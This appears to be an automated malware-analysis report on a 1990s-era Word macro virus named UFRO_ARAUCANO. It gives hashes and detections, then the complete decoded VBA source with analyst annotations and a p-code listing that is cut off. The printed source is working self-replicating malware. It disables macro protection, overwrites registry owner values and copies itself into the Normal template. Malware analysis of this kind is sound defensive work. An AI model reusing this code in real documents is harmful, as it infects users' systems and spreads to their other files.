Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06a99667e6349f54…

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-08-22 22:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: c13a0871eb4ea39397bb7609cd32cfa5 SHA-1: ab0b9c1e4818e9c4f78960e9165704c3d809a32c SHA-256: 06a99667e6349f54da3020c2a61156fac9a2230bbee25a466e35a6af9f41086a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that attempt to modify the system registry values 'RegisteredOwner' and 'RegisteredOrganization'. This behavior is indicative of malware attempting to establish persistence or modify system identification; in the extracted source, the persistence step itself is the UFRO_ARAUCANO routine, which copies the macro module between the active document and the Normal template. The macro code is partially truncated, but the intent to alter these specific registry values is clear. The ClamAV detection 'Doc.Trojan.Ded-1' further supports the malicious nature of the file.

Heuristics 2

  • ClamAV: Doc.Trojan.Ded-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ded-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6099 bytes
SHA-256: ce9d3b9521e5f9121d634afc93cd8fae5fdbcb2c3cbd81da4c88fd06a1c395f0
Detection
ClamAV: Doc.Trojan.Ded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module attribute header of the ThisDocument stream (Macros/VBA/ThisDocument, see the
' p-code listing further down); emitted verbatim by olevba ahead of the decompressed source.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Sample author's own comments (Spanish); English translations added for the analyst:
'Nombre del virus: UFRO_ARAUCANO
'   (English: "Virus name: UFRO_ARAUCANO")
'Origen: Temuco - Chile
'   (English: "Origin: Temuco - Chile")

' Analyst notes (review): auto-executing handler, runs when the document is closed.
' Any runtime error jumps to the ARAUCANO label near the end, so failures are silent.
Private Sub Document_Close()
On Error GoTo ARAUCANO
' Sets Word's Options.VirusProtection to False (the legacy macro-warning setting).
Options.VirusProtection = False
' With an empty file name, System.PrivateProfileString addresses the registry: the two
' statements below overwrite the RegisteredOwner and RegisteredOrganization values under
' HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion (matches the report summary).
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Temuco Virus Ufro"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "UFRO_ARAUCANO"
' Date-triggered display payload: a message box only on 10 October (Month = 10 And Day = 10).
If Month(Now()) = 10 And Day(Now()) = 10 Then MsgBox "UFRO_ARAUCANO", vbInformation, "INFORMACIÓN!!!"
' Rewrites the document's summary-info Author field to "adk-tvu" via the File Summary Info dialog.
With Dialogs(wdDialogFileSummaryInfo)
    .Author = "adk-tvu"
    .Execute
' Roughly one run in three (Int(3 * Rnd) = 1) calls the replication routine UFRO_ARAUCANO.
' NOTE(review): the p-code dump below renders this line (Line #12) as "ArgsCall Read" rather than
' Randomize; possibly only the disassembler's naming, but worth confirming that the decompressed
' source and the compiled p-code agree.
Randomize
If Int(3 * Rnd) = 1 Then
   UFRO_ARAUCANO
End If
' Error-handler target; it sits inside the With block, so End With still runs after an error.
ARAUCANO:
End With
End Sub
 ' Analyst notes (review): replication routine. Each branch copies the entire first code module
 ' of one container (ActiveDocument or NormalTemplate) into the other when the target does not
 ' already contain a Document_Close procedure, then saves the target.
 ' NOTE(review): the Normal-template branch is the persistence mechanism visible in this source;
 ' it corresponds more closely to Office Template Macros (T1137.001) than to the Registry Run Keys
 ' technique (T1547.001) tagged in the report header — confirm the ATT&CK mapping.
 Private Sub UFRO_ARAUCANO()
' Branch 1: the active document does not yet carry Document_Close ...
If Not ActiveDocument.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
    ' ... so every line of the Normal template's code module is copied into it, one line at a
    ' time; InsertLines at I * 3 spreads the copied lines out rather than keeping them contiguous.
    For I = 1 To NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
        lineofcode = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
        ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines I * 3, lineofcode
     Next I
    ' Saves the modified document; AddToRecentFiles:=False keeps it off Word's recent-files list.
    ActiveDocument.SaveAs AddToRecentFiles:=False
Else
' Branch 2: the document is already infected; if the Normal template lacks Document_Close ...
If Not NormalTemplate.VBProject.VBComponents(1).CodeModule.Find("Document_Close", 1, 1, 1000, 1000, False, False) Then
    ' ... the active document's code module is copied into the template the same way.
    For I = 1 To ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
        lineofcode = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(I, 1)
        NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines I * 3, lineofcode
    Next I
    ' Saves the template so the copied module survives beyond this document.
    NormalTemplate.Save
End If
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/4c37fa1e7e5a4e67a15c491a7d7b2490.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3289 bytes
' Line #0:
' 	QuoteRem 0x0000 0x001F "Nombre del virus: UFRO_ARAUCANO"
' Line #1:
' 	QuoteRem 0x0000 0x0016 "Origen: Temuco - Chile"
' Line #2:
' Line #3:
' 	FuncDefn (Private Sub Document_Close())
' Line #4:
' 	OnError ARAUCANO 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #6:
' 	LitStr 0x0011 "Temuco Virus Ufro"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000F "RegisteredOwner"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #7:
' 	LitStr 0x000D "UFRO_ARAUCANO"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0016 "RegisteredOrganization"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #8:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Month 0x0001 
' 	LitDI2 0x000A 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000A 
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000D "UFRO_ARAUCANO"
' 	Ld vbInformation 
' 	LitStr 0x000E "INFORMACIÓN!!!"
' 	ArgsCall MsgBox 0x0003 
' 	EndIf 
' Line #9:
' 	StartWithExpr 
' 	Ld wdDialogFileSummaryInfo 
' 	ArgsLd Dialogs 0x0001 
' 	With 
' Line #10:
' 	LitStr 0x0007 "adk-tvu"
' 	MemStWith Author 
' Line #11:
' 	ArgsMemCallWith Execute 0x0000 
' Line #12:
' 	ArgsCall Read 0x0000 
' Line #13:
' 	LitDI2 0x0003 
' 	Ld Rnd 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	ArgsCall UFRO_ARAUCANO 0x0000 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	Label ARAUCANO 
' Line #17:
' 	EndWith 
' Line #18:
' 	EndSub 
' Line #19:
' 	FuncDefn (Private Sub UFRO_ARAUCANO())
' Line #20:
' 	LitStr 0x000E "Document_Close"
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	LitVarSpecial (False)
' 	LitVarSpecial (False)
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0007 
' 	Not 
' 	IfBlock 
' Line #21:
' 	StartForVariable 
' 	Ld 
... (truncated)